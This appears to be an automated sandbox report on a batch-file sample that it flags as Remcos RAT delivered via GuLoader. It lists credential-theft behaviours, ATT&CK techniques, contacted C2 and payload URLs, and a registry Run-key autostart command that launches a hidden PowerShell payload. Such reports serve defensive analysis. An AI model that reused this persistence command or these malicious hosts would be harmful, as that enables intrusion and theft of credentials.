              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_21BD2264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,16_2_004082CD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2602767372.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2996, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword16_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword16_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword16_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2996, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5932, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-MC4T64Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2602767372.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2996, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		1
              Scripting              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API              		1
              DLL Side-Loading              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		1
              Credentials in Registry              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts22
              Command and Scripting Interpreter              		11
              Registry Run Keys / Startup Folder              		412
              Process Injection              		1
              Software Packing              		Security Account Manager3
              File and Directory Discovery              		SMB/Windows Admin Shares2
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login Hook11
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		NTDS27
              System Information Discovery              		Distributed Component Object ModelInput Capture1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets31
              Security Software Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture213
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539161 Sample: LTEXSP 5634 HISP9005 ST MSD... Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 39 pikolee.duckdns.org 2->39 41 plieltd.top 2->41 43 geoplugin.net 2->43 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 59 8 other signatures 2->59 9 powershell.exe 18 2->9         started        12 cmd.exe 1 2->12         started        signatures3 57 Uses dynamic DNS services 39->57 process4 signatures5 63 Early bird code injection technique detected 9->63 65 Writes to foreign memory regions 9->65 67 Found suspicious powershell code related to unpacking or dynamic code loading 9->67 71 2 other signatures 9->71 14 msiexec.exe 5 14 9->14         started        18 conhost.exe 9->18         started        69 Suspicious powershell command line found 12->69 20 powershell.exe 14 22 12->20         started        22 conhost.exe 12->22         started        process6 dnsIp7 45 pikolee.duckdns.org 143.244.46.150, 49881, 49892, 51525 COGENT-174US United States 14->45 47 geoplugin.net 178.237.33.50, 49893, 80 ATOM86-ASATOM86NL Netherlands 14->47 73 Detected Remcos RAT 14->73 75 Tries to steal Mail credentials (via file registry) 14->75 77 Maps a DLL or memory area into another process 14->77 24 msiexec.exe 2 14->24         started        27 msiexec.exe 1 14->27         started        29 cmd.exe 1 14->29         started        33 2 other processes 14->33 49 plieltd.top 104.21.56.189, 443, 49710, 49846 CLOUDFLARENETUS United States 20->49 79 Found suspicious powershell code related to unpacking or dynamic code loading 20->79 81 Powershell creates an autostart link 20->81 31 conhost.exe 20->31         started        signatures8 process9 signatures10 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 35 conhost.exe 29->35         started        37 reg.exe 1 1 29->37         started        process11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat5%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              plieltd.top
              		104.21.56.189
              		truefalse
                		unknown
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		unknown
                  pikolee.duckdns.org
                  		143.244.46.150
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://plieltd.top/dUEhUdoBD66.binfalse
                      		unknown
                      https://plieltd.top/Kvalificeredes.qxdfalse
                        		unknown
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        		unknown
                        pikolee.duckdns.orgtrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://geoplugin.net/json.gp#msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://plieltd.toppowershell.exe, 00000002.00000002.2235185548.000002440A1E0000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.imvu.comrmsiexec.exe, 00000009.00000002.4597306369.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://aefd.nelreports.net/api/report?cat=bingthbhv6E57.tmp.15.drfalse
                                		unknown
                                http://geoplugin.net/json.gplAmsiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://geoplugin.net/json.gp4msiexec.exe, 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://plieltd.top/Kvalificeredes.qxdPpowershell.exe, 00000002.00000002.2235185548.000002440868C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://aefd.nelreports.net/api/report?cat=bingaotakbhv6E57.tmp.15.drfalse
                                        		unknown
                                        https://deff.nelreports.net/api/report?cat=msnbhv6E57.tmp.15.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://plieltd.top/dUEhUdoBD66.binRekosMaggaranticonstruct.ro/dUEhUdoBD66.binmsiexec.exe, 00000009.00000002.4596776958.00000000217E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000009.00000002.4597306369.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            		unknown
                                            http://geoplugin.net/json.gpalomsiexec.exe, 00000009.00000003.2540195237.0000000005FBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://go.microsoft.co5powershell.exe, 00000002.00000002.2262357013.00000244205FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.google.commsiexec.exe, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  		unknown
                                                  https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhv6E57.tmp.15.drfalse
                                                    		unknown
                                                    https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2380563936.00000000046C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv6E57.tmp.15.drfalse
                                                      		unknown
                                                      https://contoso.com/powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2257431898.00000244184D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://login.yahoo.com/config/loginmsiexec.exefalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.nirsoft.net/msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2235185548.0000024408461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2380563936.00000000046C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://plieltd.top/Kvalificeredes.qxdXRgl8powershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv6E57.tmp.15.drfalse
                                                            		unknown
                                                            https://www.office.com/bhv6E57.tmp.15.drfalse
                                                              		unknown
                                                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2257431898.00000244184D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://geoplugin.net/json.gplmsiexec.exe, 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://plieltd.toppowershell.exe, 00000002.00000002.2235185548.0000024409A19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2235185548.000002440868C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    		unknown
                                                                    http://www.imvu.compDatamsiexec.exe, 00000012.00000003.2575617457.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575587073.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.2583210513.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575637815.0000000002D8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://go.micropowershell.exe, 00000002.00000002.2235185548.0000024409019000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.imvu.commsiexec.exe, msiexec.exe, 00000012.00000003.2575617457.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575587073.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2583210513.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575637815.0000000002D8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://aefd.nelreports.net/api/report?cat=wsbbhv6E57.tmp.15.drfalse
                                                                        		unknown
                                                                        https://contoso.com/Iconpowershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://geoplugin.net/json.gpwmsiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv6E57.tmp.15.drfalse
                                                                            		unknown
                                                                            https://plieltd.top/msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                		unknown
                                                                                https://aefd.nelreports.net/api/report?cat=bingaotbhv6E57.tmp.15.drfalse
                                                                                  		unknown
                                                                                  http://www.nirsoft.net~msiexec.exe, 0000000F.00000002.2596870063.00000000027E4000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://plieltd.top/dUEhUdoBD66.binemsiexec.exe, 00000009.00000002.4585582185.0000000005F04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://aefd.nelreports.net/api/report?cat=bingrmsbhv6E57.tmp.15.drfalse
                                                                                        		unknown
                                                                                        https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                          		unknown
                                                                                          https://plieltd.top/smsiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.2235185548.0000024408461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.ebuddy.commsiexec.exe, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            104.21.56.189
                                                                                            		plieltd.topUnited States
                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                            143.244.46.150
                                                                                            		pikolee.duckdns.orgUnited States
                                                                                            		174COGENT-174UStrue
                                                                                            178.237.33.50
                                                                                            		geoplugin.netNetherlands
                                                                                            		8455ATOM86-ASATOM86NLfalse

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1539161
                                                                                            Start date and time:2024-10-22 09:39:10 +02:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 9m 42s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:19
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winBAT@22/12@3/3
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 66.7%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 96%
                                                                                            • Number of executed functions: 160
                                                                                            • Number of non-executed functions: 287
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .bat
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 2912 because it is empty
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6776 because it is empty
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • VT rate limit hit for: LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            03:40:02API Interceptor87x Sleep call for process: powershell.exe modified
                                                                                            03:41:16API Interceptor4321316x Sleep call for process: msiexec.exe modified
                                                                                            09:40:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Forsnakket154 %Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)
                                                                                            09:40:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Forsnakket154 %Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            104.21.56.189rEXSP5634HISP9005STMSDSDOKUME74247linierelet.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                178.237.33.50DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                Order.vbsGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • geoplugin.net/json.gp
                                                                                                duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                                                                • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                                lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                                                                • www.geoplugin.net/xml.gp?ip=SEU_IP

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                plieltd.toprEXSP5634HISP9005STMSDSDOKUME74247linierelet.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 172.67.155.139
                                                                                                rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 172.67.155.139
                                                                                                rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                geoplugin.netDHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
